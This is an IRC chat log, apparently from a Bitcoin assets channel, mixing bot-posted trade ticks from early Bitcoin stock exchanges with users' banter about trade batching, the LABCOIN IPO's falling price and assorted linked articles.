BTC [-] Sep 17 20:24:04 [BTCTC] [S] [BTC-TRADING-PT] 3 @ 0.963 = 2.889 BTC [-] Sep 17 20:25:05 [HAVELOCK] [S] [AM100] 25 @ 0.01968798 = 0.4922 BTC [+] {3} Sep 17 20:26:06 [BTCTC] [S] [BTC-TRADING-PT] 7 @ 0.963 = 6.741 BTC [-] {2} Sep 17 20:27:07 [BTCTC] [S] [LABCOIN] 100 @ 0.002784 = 0.2784 BTC [-] Sep 17 20:28:08 [BTCTC] [S] [BTC-TRADING-PT] 3 @ 0.963 = 2.889 BTC [-] Sep 17 20:29:09 [BTCTC] [S] [LABCOIN] 1 @ 0.002782 BTC [-] Sep 17 20:29:09 [BTCTC] [S] [BTC-TRADING-PT] 3 @ 0.963 = 2.889 BTC [-] Sep 17 20:30:07 kakobrekla: can we add colors too? :D Sep 17 20:30:10 [HAVELOCK] [S] [HIM] 90 @ 0.16844332 = 15.1599 BTC [+] {5} Sep 17 20:31:11 [BTCTC] [S] [LABCOIN] 11400 @ 0.00272977 = 31.1194 BTC [-] {23} Sep 17 20:31:27 ooo neat its collecting groups of trades now? Sep 17 20:31:31 the {xx} Sep 17 20:31:37 is how many trades were in that batch? Sep 17 20:31:47 whats the rolling window? Sep 17 20:31:55 a few seconds ? Sep 17 20:32:12 [BTCTC] [S] [LABCOIN] 94 @ 0.0028 = 0.2632 BTC [+] Sep 17 20:32:13 [BTCTC] [S] [BTC-TRADING-PT] 5 @ 0.963 = 4.815 BTC [-] Sep 17 20:32:14 1 minute topace Sep 17 20:32:19 ah Sep 17 20:32:26 thats long Sep 17 20:32:27 heh Sep 17 20:32:34 it helps avoid pissing off freenode antispam Sep 17 20:32:38 hehe Sep 17 20:32:55 it'll be good for the IPO's too Sep 17 20:33:04 BOOM all in one shot Sep 17 20:33:14 [BTCTC] [S] [LABCOIN] 4069 @ 0.00270024 = 10.9873 BTC [-] {4} Sep 17 20:33:14 [BTCTC] [S] [BTC-TRADING-PT] 5 @ 0.963 = 4.815 BTC [-] Sep 17 20:33:55 twss Sep 17 20:35:16 [BTCTC] [S] [ASICMINER-PT] 10 @ 2.0454 = 20.454 BTC [-] {3} Sep 17 20:35:16 [BTCTC] [S] [LABCOIN] 1931 @ 0.00265268 = 5.1223 BTC [-] {15} Sep 17 20:36:17 [HAVELOCK] [B] [XBOND] 3 @ 0.0012 = 0.0036 BTC [-] Sep 17 20:36:18 [BTCTC] [S] [LABCOIN] 1074 @ 0.00269569 = 2.8952 BTC [+] {2} Sep 17 20:36:18 [BTCTC] [S] [BTC-TRADING-PT] 5 @ 0.963 = 4.815 BTC [-] Sep 17 20:37:09 Which IPO? Sep 17 20:37:18 [BTCTC] [S] [LABCOIN] 8579 @ 0.00260473 = 22.346 BTC [-] {18} Sep 17 20:37:18 [BTCTC] [S] [BTC-TRADING-PT] 5 @ 0.963 = 4.815 BTC [-] Sep 17 20:38:18 [BTCTC] [S] [LABCOIN] 394 @ 0.00258283 = 1.0176 BTC [-] {7} Sep 17 20:39:19 [BTCTC] [S] [BTC-TRADING-PT] 5 @ 0.963 = 4.815 BTC [-] Sep 17 20:40:20 [BTCTC] [S] [BTC-TRADING-PT] 4 @ 0.963 = 3.852 BTC [-] Sep 17 20:41:21 [BTCTC] [S] [CIPHERMINE-PT] 21 @ 0.05160476 = 1.0837 BTC [-] {2} Sep 17 20:43:23 [BTCTC] [S] [LABCOIN] 10 @ 0.0026696 = 0.0267 BTC [+] {2} Sep 17 20:43:39 I dont think he was specifying an IPO, but there is the NEOBEE offering on Friday Sep 17 20:44:24 [BTCTC] [S] [LABCOIN] 1 @ 0.002749 BTC [+] Sep 17 20:44:24 [HAVELOCK] [B] [XBOND] 2 @ 0.0012 = 0.0024 BTC [-] Sep 17 20:44:30 i like the spam :( Sep 17 20:45:25 [HAVELOCK] [B] [XBOND] 457 @ 0.001199 = 0.5479 BTC [-] {2} Sep 17 20:46:26 [BTCTC] [S] [LABCOIN] 10 @ 0.00264229 = 0.0264 BTC [-] {5} Sep 17 20:49:29 [BTCTC] [S] [LABCOIN] 206 @ 0.00258092 = 0.5317 BTC [-] {5} Sep 17 20:50:30 [HAVELOCK] [S] [SDSTM] 1 @ 0.00249 BTC [+] Sep 17 20:53:33 [BTCTC] [S] [TAT.ASICMINER] 30 @ 0.01928 = 0.5784 BTC [-] Sep 17 20:53:33 [BTCTC] [S] [LABCOIN] 1 @ 0.002584 BTC [+] Sep 17 20:54:34 [BTCTC] [S] [LABCOIN] 565 @ 0.002584 = 1.46 BTC [+] {4} Sep 17 20:55:35 [BTCTC] [S] [TAT.ASICMINER] 5 @ 0.01893 = 0.0947 BTC [-] Sep 17 20:55:35 [BTCTC] [S] [DMS.MINING] 1 @ 0.002493 BTC [+] Sep 17 20:57:37 [BTCTC] [S] [ACTIVEMINING] 10 @ 0.00264 = 0.0264 BTC [-] Sep 17 20:59:39 [MPEX] [S] [S.MPOE] 3900 @ 0.00092087 = 3.5914 BTC [+] Sep 17 21:00:40 [HAVELOCK] [B] [XBOND] 1 @ 0.00121499 BTC [+] Sep 17 21:01:59 http://trilema.com/2013/the-sanity-dogma/ dub pankkake TomServo and who else was interested. Sep 17 21:02:02 The sanity “dogma”. pe Trilema - Un blog de Mircea Popescu. Sep 17 21:02:42 [HAVELOCK] [B] [XBOND] 395 @ 0.00121798 = 0.4811 BTC [+] {2} Sep 17 21:02:51 every IRC discussions seems to end up on trilema Sep 17 21:03:06 my next goal in life: an article about platypuses Sep 17 21:03:14 i have one about hyenas Sep 17 21:03:43 [HAVELOCK] [B] [XBOND] 78 @ 0.00124172 = 0.0969 BTC [+] {2} Sep 17 21:08:48 [BTCTC] [S] [BASIC-MINING] 11 @ 0.11 = 1.21 BTC [+] Sep 17 21:10:51 [BTCTC] [S] [LABCOIN] 30 @ 0.00267565 = 0.0803 BTC [+] {5} Sep 17 21:10:51 [HAVELOCK] [B] [XBOND] 2 @ 0.001244 = 0.0025 BTC [+] Sep 17 21:12:53 [HAVELOCK] [S] [SDSTM] 100 @ 0.0024 = 0.24 BTC [-] Sep 17 21:21:01 [HAVELOCK] [S] [LABCO] 5 @ 0.0025 = 0.0125 BTC [+] Sep 17 21:22:02 [HAVELOCK] [B] [XBOND] 998 @ 0.001244 = 1.2415 BTC [+] Sep 17 21:23:03 [BTCTC] [S] [DMS.MINING] 18 @ 0.002369 = 0.0426 BTC [-] Sep 17 21:23:03 [HAVELOCK] [B] [XBOND] 456 @ 0.001244 = 0.5673 BTC [+] Sep 17 21:24:04 [HAVELOCK] [B] [XBOND] 673 @ 0.001248 = 0.8399 BTC [+] {2} Sep 17 21:27:07 [BTCTC] [S] [LABCOIN] 24 @ 0.00266574 = 0.064 BTC [-] {4} Sep 17 21:30:10 [BTCTC] [S] [LABCOIN] 7 @ 0.002711 = 0.019 BTC [+] Sep 17 21:31:11 [BTCTC] [S] [LABCOIN] 7 @ 0.00263685 = 0.0185 BTC [-] {2} Sep 17 21:33:13 [BTCTC] [S] [LABCOIN] 11307 @ 0.00252582 = 28.5594 BTC [-] {26} Sep 17 21:38:18 [BTCTC] [S] [LABCOIN] 16 @ 0.002666 = 0.0427 BTC [+] Sep 17 21:39:19 [BTCTC] [S] [ACTIVEMINING] 2000 @ 0.00258037 = 5.1607 BTC [-] {2} Sep 17 21:39:19 [BTCTC] [FN] [DMS.PURCHASE] 49 @ 0.009339 = 0.4576 BTC [-] Sep 17 21:40:20 [BTCTC] [S] [LABCOIN] 37260 @ 0.00250031 = 93.1616 BTC [-] {17} Sep 17 21:41:21 [BTCTC] [S] [LABCOIN] 9 @ 0.002564 = 0.0231 BTC [+] Sep 17 21:42:22 [BTCTC] [S] [LABCOIN] 200 @ 0.00255 = 0.51 BTC [-] Sep 17 21:43:23 [BTCTC] [S] [LABCOIN] 800 @ 0.00255 = 2.04 BTC [-] {4} Sep 17 21:44:24 [BTCTC] [S] [LABCOIN] 1325 @ 0.00255 = 3.3788 BTC [-] {4} Sep 17 21:45:25 [BTCTC] [S] [LABCOIN] 541 @ 0.0024318 = 1.3156 BTC [-] {9} Sep 17 21:46:26 [BTCTC] [S] [LABCOIN] 2899 @ 0.00235231 = 6.8193 BTC [-] {6} Sep 17 21:46:26 [BTCTC] [S] [ACTIVEMINING] 1717 @ 0.00258 = 4.4299 BTC [-] Sep 17 21:47:27 [BTCTC] [S] [LABCOIN] 732 @ 0.00229179 = 1.6776 BTC [-] {4} Sep 17 21:47:27 [BTCTC] [S] [ASICMINER-PT] 2 @ 2.045 = 4.09 BTC [-] Sep 17 21:49:29 [BTCTC] [S] [LABCOIN] 50 @ 0.0023814 = 0.1191 BTC [+] {2} Sep 17 21:52:31 [BTCTC] [S] [LABCOIN] 61553 @ 0.00223192 = 137.3814 BTC [-] {29} Sep 17 21:52:35 assbot is very very delayed now Sep 17 21:52:40 wow Sep 17 21:53:06 cant keep up with forthcoming torrential labcoin shower Sep 17 21:53:31 Golden shower. Sep 17 21:53:32 [BTCTC] [S] [LABCOIN] 33316 @ 0.00223616 = 74.4999 BTC [+] {11} Sep 17 21:54:33 [BTCTC] [S] [LABCOIN] 771 @ 0.00220484 = 1.6999 BTC [-] {9} Sep 17 21:54:34 [BTCTC] [S] [ACTIVEMINING] 1806 @ 0.0025307 = 4.5704 BTC [-] {3} Sep 17 21:55:34 [BTCTC] [S] [LABCOIN] 2598 @ 0.00219987 = 5.7153 BTC [-] {4} Sep 17 21:55:54 >D take that goyims Sep 17 21:56:05 dude teh merging is a thing of beautuy Sep 17 21:56:10 chan is like almost readable now Sep 17 21:56:35 [BTCTC] [S] [LABCOIN] 14187 @ 0.00210726 = 29.8957 BTC [-] {24} Sep 17 21:56:36 [MPEX] [S] [S.MPOE] 21450 @ 0.00092124 = 19.7606 BTC [+] {2} Sep 17 21:56:54 i like the vwap but i miss the spam.. it's less.. entertaining Sep 17 21:57:19 so join the spamchan neh ? Sep 17 21:57:31 i forget what it's called, bitcoin-trades maybe ? Sep 17 21:57:37 [BTCTC] [S] [LABCOIN] 5641 @ 0.002102 = 11.8574 BTC [-] {2} Sep 17 21:57:50 no idea man Sep 17 21:58:32 and who would be in there to enjoy popcorn with me as labcoin goes to da moon/ground? Sep 17 21:58:38 [BTCTC] [S] [ET.DIFF.FUTURE] 6 @ 0.0204 = 0.1224 BTC Sep 17 21:58:38 [BTCTC] [S] [ASICMINER-PT] 10 @ 2.04349999 = 20.435 BTC [-] {4} Sep 17 21:59:45 http://theweek.com/article/index/249613/the-secret-of-finlands-stellar-schools Sep 17 21:59:48 "Maybe the real mystery was not why Finnish kids cared so much, but why so many of her Oklahoma classmates did not. After all, for them, too, getting a good education was the only way to go to college and get a good job. Somewhere along the way, however, many of them had stopped believing in this equation. They didn't take education very seriously. Maybe because they were lazy, spoiled, or Sep 17 21:59:50 The secret of Finland's stellar schools - The Week Sep 17 21:59:50 dysfunctional in some other way, or maybe because, in their experience, education wasn't all that serious." Sep 17 22:00:17 children see through adults lies a little more easily than the adults do. Sep 17 22:00:17 just joined #labcoin for the jokes Sep 17 22:00:24 the ones posted on the forum are hilarious Sep 17 22:00:32 18:21] "I don't say I have the truth about the timezone. The market will decide if the timeline is now or not. We'll see." Sep 17 22:00:34 benkay that is a good objection. Sep 17 22:00:38 [18:22] the ultimate in rational market theory Sep 17 22:00:38 [18:22] the market determines TIME ITSELF Sep 17 22:00:49 clueless teachers is probably the egg of that chicken Sep 17 22:01:28 you can abstract it a layer above that and point at the role of school in america as state-sponsored daycare Sep 17 22:01:30 not education Sep 17 22:01:30 pankkake when was the chan reg'd ? Sep 17 22:01:32 the spam chan is #bitcoin-assets-trades Sep 17 22:01:42 not sure it even has ops Sep 17 22:02:46 has the same setup there Sep 17 22:05:00 zoinky o, that is probably not so great Sep 17 22:05:14 haha nope Sep 17 22:05:45 [BTCTC] [S] [LABCOIN] 97 @ 0.00242534 = 0.2353 BTC [+] {3} Sep 17 22:05:55 be cool if that channel was still the spamming setup Sep 17 22:06:22 mircea_popescu: http://paulgraham.com/fr.html in which paul graham starts telling people what the fuck to do Sep 17 22:06:31 "follow these rules, kids." Sep 17 22:06:46 [BTCTC] [S] [LABCOIN] 11685 @ 0.00248741 = 29.0654 BTC [+] {9} Sep 17 22:06:48 gfh! Sep 17 22:07:08 "get the fuck from here"? Sep 17 22:07:47 [BTCTC] [S] [LABCOIN] 4458 @ 0.00247857 = 11.0495 BTC [-] {6} Sep 17 22:08:49 [BTCTC] [S] [LABCOIN] 1000 @ 0.002498 = 2.498 BTC [+] {4} Sep 17 22:09:49 [BTCTC] [S] [LABCOIN] 1 @ 0.002497 BTC [-] Sep 17 22:10:25 good for him Sep 17 22:11:52 [BTCTC] [S] [LABCOIN] 8600 @ 0.00235021 = 20.2118 BTC [-] {4} Sep 17 22:12:53 [BTCTC] [S] [ET.DIFF.LONG] 1 @ 0.01 BTC [+] Sep 17 22:13:37 ah Sep 17 22:13:53 [BTCTC] [S] [LABCOIN] 3763 @ 0.00229261 = 8.6271 BTC [-] {19} Sep 17 22:13:53 [BTCTC] [S] [DMS.MINING] 1 @ 0.002493 BTC [+] Sep 17 22:13:57 https://bitcointalk.org/index.php?topic=263445.msg3175619#msg3175619 Sep 17 22:14:07 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Sep 17 22:14:11 so i just had a dork try to impersonate me to dc ppls. us ips/us phone numbers. Sep 17 22:14:24 i wonder if the fbi still does anything over tehre or not really. Sep 17 22:14:54 [BTCTC] [S] [LABCOIN] 10721 @ 0.00222303 = 23.8331 BTC [-] {6} Sep 17 22:15:55 [BTCTC] [S] [TAT.VIRTUALMINE] 2 @ 0.000651 = 0.0013 BTC [+] Sep 17 22:16:56 [BTCTC] [S] [LABCOIN] 20669 @ 0.00215245 = 44.489 BTC [-] {17} Sep 17 22:19:59 [HAVELOCK] [S] [HIM] 25 @ 0.16 = 4 BTC [-] Sep 17 22:20:00 [BTCTC] [S] [LABCOIN] 12572 @ 0.0023497 = 29.5404 BTC [+] {3} Sep 17 22:21:00 [BTCTC] [S] [LABCOIN] 20 @ 0.002376 = 0.0475 BTC [+] Sep 17 22:27:06 [HAVELOCK] [B] [XBOND] 1 @ 0.00117 BTC [-] Sep 17 22:29:08 [BTCTC] [S] [LABCOIN] 1500 @ 0.00241471 = 3.6221 BTC [+] {2} Sep 17 22:29:20 benkay http://www.scottaaronson.com/blog/?p=304 Sep 17 22:29:24 probably of interest to you. Sep 17 22:32:11 [BTCTC] [S] [LABCOIN] 8260 @ 0.00219353 = 18.1186 BTC [-] {17} Sep 17 22:32:11 [MPEX] [S] [S.MPOE] 7192 @ 0.00092022 = 6.6182 BTC [-] {2} Sep 17 22:32:12 Wait, they ever did anything at all? Sep 17 22:33:12 [BTCTC] [S] [LABCOIN] 22 @ 0.00230154 = 0.0506 BTC [+] {2} Sep 17 22:33:33 which dc people? Sep 17 22:34:13 [BTCTC] [S] [LABCOIN] 979 @ 0.0023 = 2.2517 BTC [-] Sep 17 22:35:14 [BTCTC] [S] [LABCOIN] 1 @ 0.002333 BTC [+] Sep 17 22:35:14 [HAVELOCK] [S] [CBTC] 100 @ 0.000481 = 0.0481 BTC [-] Sep 17 22:36:56 mircea_popescu: i still suspect that it's possible and has been done by institutions with very deep pockets. Sep 17 22:37:16 [BTCTC] [S] [LABCOIN] 1 @ 0.002333 BTC [+] Sep 17 22:37:30 mircea_popescu: that said i'm interested in simulating quantum circuits to stretch my brain mostly Sep 17 22:39:18 [BTCTC] [S] [LABCOIN] 39 @ 0.00233 = 0.0909 BTC [-] Sep 17 22:39:32 when it comes to profit, i'm laser-focused on building software for others and as a moon shot doing some quant work Sep 17 22:39:47 quant finance not quantum sims :) Sep 17 22:41:20 [BTCTC] [S] [LABCOIN] 5000 @ 0.00230258 = 11.5129 BTC [-] {5} Sep 17 22:41:37 jus' sayin'. Sep 17 22:45:24 [BTCTC] [S] [LABCOIN] 3100 @ 0.00217056 = 6.7287 BTC [-] {10} Sep 17 22:46:25 [BTCTC] [S] [ACTIVEMINING] 1202 @ 0.00255036 = 3.0655 BTC [+] {2} Sep 17 22:46:25 [MPEX] [S] [S.MPOE] 2200 @ 0.00092144 = 2.0272 BTC [+] Sep 17 22:47:54 https://bitcointalk.org/index.php?topic=263445.msg3175961#msg3175961 Sep 17 22:47:59 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Sep 17 22:48:27 [BTCTC] [S] [LABCOIN] 8000 @ 0.0021612 = 17.2896 BTC [-] {15} Sep 17 22:49:04 this is unbelievable Sep 17 22:49:48 labcoin to da ground looks like Sep 17 22:49:49 lol Sep 17 22:50:29 [BTCTC] [S] [LABCOIN] 23 @ 0.002259 = 0.052 BTC [+] Sep 17 22:51:10 they promise more and more, but delay more and more Sep 17 22:51:35 so sell it and move on Sep 17 22:51:43 you'll spare yourelf some grey hairs Sep 17 22:51:59 would have to buy it in the first place Sep 17 22:52:06 I'm just here for the jokes Sep 17 22:52:16 and the gifs Sep 17 22:52:31 [BTCTC] [S] [LABCOIN] 36287 @ 0.00217923 = 79.0777 BTC [-] {32} Sep 17 22:53:13 was a fun rollercoaster Sep 17 22:53:32 [BTCTC] [S] [LABCOIN] 2543 @ 0.00211952 = 5.3899 BTC [-] {7} Sep 17 22:54:20 for bad for whoever did that pump to .003 this morning Sep 17 22:54:24 feel bad Sep 17 22:54:34 [BTCTC] [S] [LABCOIN] 200 @ 0.0021004 = 0.4201 BTC [-] {3} Sep 17 22:55:35 [BTCTC] [S] [ESECURITYSABTC] 2 @ 0.2122 = 0.4244 BTC [-] Sep 17 22:55:57 from da window Sep 17 22:55:59 to the wall Sep 17 22:56:10 https://www.youtube.com/watch?v=vVF-O9aM3-8&feature=player_detailpage#t=1091 Sep 17 22:56:12 the pump was due to "we will post mining address tomorrow" Sep 17 22:56:12 Fireside chat with Shakil Khan, Charlie Shrem & Peter Vessenes - YouTube Sep 17 22:56:35 [BTCTC] [S] [TAT.ASICMINER] 6 @ 0.01928 = 0.1157 BTC [+] Sep 17 22:57:37 [BTCTC] [FN] [DMS.SELLING] 5 @ 0.007 = 0.035 BTC [-] Sep 17 22:57:37 [BTCTC] [S] [DMS.MINING] 5 @ 0.002399 = 0.012 BTC [-] Sep 17 22:57:37 [BTCTC] [FN] [DMS.PURCHASE] 5 @ 0.009339 = 0.0467 BTC [-] Sep 17 22:58:38 [BTCTC] [S] [TAT.ASICMINER] 15 @ 0.01928 = 0.2892 BTC [+] Sep 17 22:59:36 TheSwede75 was quite ballsy that time though. "24h from NOW" Sep 17 22:59:59 "no specific TIME set" Sep 17 23:00:12 troll Sep 17 23:00:14 kng Sep 17 23:00:17 king* Sep 17 23:03:26 ;;seen korbman Sep 17 23:03:26 korbman was last seen in #bitcoin-assets 6 weeks, 4 days, 3 hours, 8 minutes, and 17 seconds ago: not sure about that, since I joined this channel not too long ago Sep 17 23:03:43 [BTCTC] [S] [LABCOIN] 825 @ 0.002217 = 1.829 BTC [+] Sep 17 23:04:44 [MPEX] [S] [S.MPOE] 9455 @ 0.00092144 = 8.7122 BTC [+] Sep 17 23:04:44 [BTCTC] [S] [LABCOIN] 825 @ 0.002216 = 1.8282 BTC [-] Sep 17 23:04:57 ThickAsThieves: very interesting Sep 17 23:05:04 huh korbman hasnt been around in a while Sep 17 23:05:05 weird Sep 17 23:05:45 [BTCTC] [S] [LABCOIN] 4696 @ 0.00227696 = 10.6926 BTC [+] {7} Sep 17 23:06:46 [HAVELOCK] [B] [XBOND] 8 @ 0.001248 = 0.01 BTC [+] Sep 17 23:06:47 [BTCTC] [S] [LABCOIN] 630 @ 0.002339 = 1.4736 BTC [+] {2} Sep 17 23:06:47 [BTCTC] [S] [BASIC-MINING] 100 @ 0.11 = 11 BTC [+] Sep 17 23:07:47 [BTCTC] [S] [LABCOIN] 200 @ 0.0023417 = 0.4683 BTC [+] {2} Sep 17 23:07:47 [HAVELOCK] [S] [SMG] 3 @ 0.000224 = 0.0007 BTC [+] Sep 17 23:08:48 [BTCTC] [S] [LABCOIN] 540 @ 0.0023473 = 1.2675 BTC [+] {4} Sep 17 23:10:50 [BTCTC] [S] [LABCOIN] 5 @ 0.002348 = 0.0117 BTC [+] Sep 17 23:11:51 [BTCTC] [S] [ACTIVEMINING] 22661 @ 0.00251071 = 56.8952 BTC [-] {15} Sep 17 23:12:52 [MPEX] [S] [S.MPOE] 4700 @ 0.00092126 = 4.3299 BTC [-] Sep 17 23:12:52 [BTCTC] [S] [LABCOIN] 175 @ 0.002376 = 0.4158 BTC [+] Sep 17 23:12:52 [HAVELOCK] [S] [LABCO] 15 @ 0.0025 = 0.0375 BTC [+] Sep 17 23:12:54 [BTCTC] [S] [DMS.MINING] 50 @ 0.0024933 = 0.1247 BTC [+] {2} Sep 17 23:13:53 [BTCTC] [S] [LABCOIN] 5719 @ 0.0023909 = 13.6736 BTC [+] {7} Sep 17 23:14:54 [BTCTC] [S] [ET.DIFF.FUTURE] 50 @ 0.0204 = 1.02 BTC Sep 17 23:15:55 [BTCTC] [S] [BASIC-MINING] 2 @ 0.11 = 0.22 BTC [+] Sep 17 23:15:55 [BTCTC] [S] [LABCOIN] 1500 @ 0.00249595 = 3.7439 BTC [+] {3} Sep 17 23:16:56 [HAVELOCK] [S] [AM100] 12 @ 0.01969998 = 0.2364 BTC [+] Sep 17 23:16:57 [BTCTC] [S] [LABCOIN] 95 @ 0.00247778 = 0.2354 BTC [-] {2} Sep 17 23:17:57 [BTCTC] [S] [LABCOIN] 405 @ 0.00254731 = 1.0317 BTC [+] {2} Sep 17 23:18:58 [HAVELOCK] [S] [AM100] 3 @ 0.01969999 = 0.0591 BTC [+] Sep 17 23:19:02 thinking about commenting the sanity dogma articl..but just too alien mindstuff Sep 17 23:19:21 that's where the best comments spring from Sep 17 23:19:56 People also don’t stay stupid unless oppressed by some sort of socialism (so the stupid rich may be created) Sep 17 23:19:59 [BTCTC] [S] [LABCOIN] 2167 @ 0.00250185 = 5.4215 BTC [-] {3} Sep 17 23:20:15 assbot, what's [S]? Sep 17 23:20:19 like, scandinavia is gobbled by stupid people yea Sep 17 23:20:35 dexX7 stocks Sep 17 23:20:39 i see Sep 17 23:20:53 it's a bit confussing, because btct uses (b) and (s) for buying, selling Sep 17 23:21:00 [BTCTC] [S] [LABCOIN] 1577 @ 0.002527 = 3.9851 BTC [+] {4} Sep 17 23:21:46 that is a bit confusing because every trade consists of equal parts buying and selling Sep 17 23:22:01 [BTCTC] [S] [LABCOIN] 1166 @ 0.00254995 = 2.9732 BTC [+] {2} Sep 17 23:22:23 yeah well.. "bid filled, ask filled" Sep 17 23:23:20 arbitrarily signed things Sep 17 23:23:34 aka nonsense. Sep 17 23:24:02 [BTCTC] [S] [LABCOIN] 3050 @ 0.00254969 = 7.7766 BTC [-] {6} Sep 17 23:24:23 the traditional and sensible approach is to simply note the trade, the average price, and whether the price closed lower and higher Sep 17 23:24:30 lower or* higher Sep 17 23:25:03 but i suppose that some people are incapable of backing out what happened from that in much the same way that it takes quite a lot of staring at charts to understand candlestick patterns Sep 17 23:25:22 but who am i Sep 17 23:25:41 to call shenanigans on such respected community institutions as btct Sep 17 23:26:00 technically this is sillynegans not shenanigans Sep 17 23:26:28 well anyway, i don't like the current change. the delay is not cool. Sep 17 23:26:57 any you can identify the end of a trade "block", if the time diff is > 1 sec Sep 17 23:27:05 [HAVELOCK] [S] [SMG] 6 @ 0.0001735 = 0.001 BTC [-] Sep 17 23:27:12 combing trades together is a no go for me Sep 17 23:27:40 ya, but the spam-counter-aspect is reasonable Sep 17 23:27:44 Rulother what's the objection ? Sep 17 23:27:51 I understand that... Sep 17 23:28:06 [BTCTC] [S] [LABCOIN] 563 @ 0.00243436 = 1.3705 BTC [-] {4} Sep 17 23:28:09 I like to be able to see individual trades not one that's lumped together and look like a massive trade Sep 17 23:28:30 those are individual trades most likely Sep 17 23:28:34 Nope Sep 17 23:28:42 like that one was 4 trades together Sep 17 23:28:43 go to https://btct.co/ , click Realtime? Sep 17 23:28:49 That is what I'm doing :) Sep 17 23:28:49 problem solved Sep 17 23:28:54 kakobrekla will prolly make assbot talk spam in -trades Sep 17 23:28:57 But I liked having the asset bot do the work for me Sep 17 23:29:06 tho yeah... can also use the provided firehose. Sep 17 23:29:07 [BTCTC] [S] [LABCOIN] 1485 @ 0.00233251 = 3.4638 BTC [-] {9} Sep 17 23:29:10 let's say: i buy 5000 labcoin. the trade is 5000, but it filles multiple orders Sep 17 23:29:43 that's still one trade? Sep 17 23:30:01 If there's a donation box or something to help pay for some extra service from freenode, I'll donate Sep 17 23:30:22 dexX7: don't start the unit flamewar again :) Sep 17 23:30:33 again? :) Sep 17 23:30:39 i must have missed that Sep 17 23:30:47 the bitfury one Sep 17 23:30:50 I'll stop there :P Sep 17 23:30:54 oh Sep 17 23:30:55 lol Sep 17 23:30:56 i see Sep 17 23:31:09 [BTCTC] [S] [ASICMINER-PT] 5 @ 2.0726 = 10.363 BTC [+] {4} Sep 17 23:31:15 Rulother i used to but freenode decided taking donations is too much of a pain Sep 17 23:31:18 you can give them a box tho Sep 17 23:31:31 jackmaninov jborkl jcpham Jezzz joesmoe joeykrim johngalt jordandotdev jurov Sep 17 23:31:31 too much of a pain for free money? Sep 17 23:31:32 lol jurov Sep 17 23:31:33 dexX7: yes. that is one trade. Sep 17 23:31:42 dexX7: it clears multiple orders. Sep 17 23:31:45 yes Sep 17 23:32:10 [BTCTC] [S] [TAT.VIRTUALMINE] 1 @ 0.000613 BTC [-] Sep 17 23:34:12 [HAVELOCK] [S] [CBTC] 20 @ 0.000493 = 0.0099 BTC [+] Sep 17 23:37:15 [MPEX] [S] [S.MPOE] 3775 @ 0.00091565 = 3.4566 BTC [-] Sep 17 23:38:17 [BTCTC] [S] [LABCOIN] 11 @ 0.002406 = 0.0265 BTC [+] {2} Sep 17 23:39:18 [BTCTC] [S] [LABCOIN] 1 @ 0.002406 BTC [+] Sep 17 23:40:19 [MPEX] [S] [S.MPOE] 13900 @ 0.00092142 = 12.8077 BTC [+] {2} Sep 17 23:40:19 [BTCTC] [S] [LABCOIN] 25 @ 0.00240636 = 0.0602 BTC [+] {2} Sep 17 23:41:20 [BTCTC] [S] [LABCOIN] 16 @ 0.002407 = 0.0385 BTC [+] Sep 17 23:43:22 [BTCTC] [S] [KENILWORTH] 1 @ 0.001649 BTC [+] Sep 17 23:46:25 [BTCTC] [S] [TAT.VIRTUALMINE] 4 @ 0.000651 = 0.0026 BTC [+] Sep 17 23:53:32 [BTCTC] [FN] [DMS.PURCHASE] 8 @ 0.009339 = 0.0747 BTC [-] Sep 17 23:57:41 btct: New account registrations are temporarily disabled. Sorry for the inconvenience. Sep 17 23:58:37 [MPEX] [S] [S.MPOE] 9320 @ 0.00092191 = 8.5922 BTC [+] {2} Sep 17 23:58:37 Sorry for the convenience. Sep 17 23:59:17 sorry for the incontinence Sep 17 23:59:33 understandable Sep 18 00:02:41 [BTCTC] [S] [PETA-MINE] 1 @ 0.654 BTC [-] Sep 18 00:04:43 [BTCTC] [S] [ASICMINER-PT] 1 @ 2.05 BTC [-] Sep 18 00:04:43 [BTCTC] [S] [LABCOIN] 125 @ 0.0024292 = 0.3037 BTC [+] {4} Sep 18 00:05:44 [BTCTC] [S] [LABCOIN] 50 @ 0.002433 = 0.1217 BTC [+] Sep 18 00:06:45 [BTCTC] [S] [RSM] 72 @ 0.00871 = 0.6271 BTC [+] Sep 18 00:09:48 [BTCTC] [S] [CIPHERMINE-PT] 34 @ 0.05158823 = 1.754 BTC [-] {2} Sep 18 00:10:49 [BTCTC] [S] [LABCOIN] 338 @ 0.00246239 = 0.8323 BTC [+] {5} Sep 18 00:11:50 [BTCTC] [S] [LABCOIN] 985 @ 0.00240966 = 2.3735 BTC [-] {4} Sep 18 00:12:51 [BTCTC] [S] [LABCOIN] 200 @ 0.002409 = 0.4818 BTC [-] Sep 18 00:14:53 [BTCTC] [S] [LABCOIN] 100 @ 0.002409 = 0.2409 BTC [-] Sep 18 00:15:54 [BTCTC] [S] [LABCOIN] 320 @ 0.00240797 = 0.7706 BTC [-] {5} Sep 18 00:18:57 [BTCTC] [S] [LABCOIN] 66 @ 0.0024736 = 0.1633 BTC [+] {2} Sep 18 00:19:58 [BTCTC] [S] [ASICMINER-PT] 1 @ 2.042 BTC [-] Sep 18 00:20:59 [BTCTC] [S] [LABCOIN] 147 @ 0.002485 = 0.3653 BTC [+] Sep 18 00:22:00 [BTCTC] [S] [LABCOIN] 529 @ 0.002485 = 1.3146 BTC [+] Sep 18 00:23:01 [BTCTC] [S] [LABCOIN] 47 @ 0.002485 = 0.1168 BTC [+] Sep 18 00:23:51 http://www.explosm.net/comics/3104/ Sep 18 00:23:53 Cyanide & Happiness #3104 - Explosm.net Sep 18 00:25:06 Well my cards are still suspended... I have to fucking go in person to the tellers to do anything. Sep 18 00:25:17 Definitly not using e-Interac ever again. Sep 18 00:25:42 On a side note, another cash transaction just completed. Smooth as ever. Sep 18 00:27:06 why sell FI stocks, reason #5467554698 : they comply with government regulation. Sep 18 00:28:07 [BTCTC] [S] [LABCOIN] 1701 @ 0.0025084 = 4.2668 BTC [+] {5} Sep 18 00:29:08 [BTCTC] [S] [LABCOIN] 335 @ 0.002499 = 0.8372 BTC [-] Sep 18 00:31:10 [HAVELOCK] [B] [XBOND] 1 @ 0.001247 BTC [-] Sep 18 00:32:13 What's FI? Sep 18 00:33:02 Fucking Intense.... no idea Sep 18 00:33:12 [HAVELOCK] [S] [HIM] 2 @ 0.17945 = 0.3589 BTC [+] {2} Sep 18 00:33:13 [BTCTC] [S] [ASICMINER-PT] 2 @ 2.042 = 4.084 BTC [-] Sep 18 00:33:42 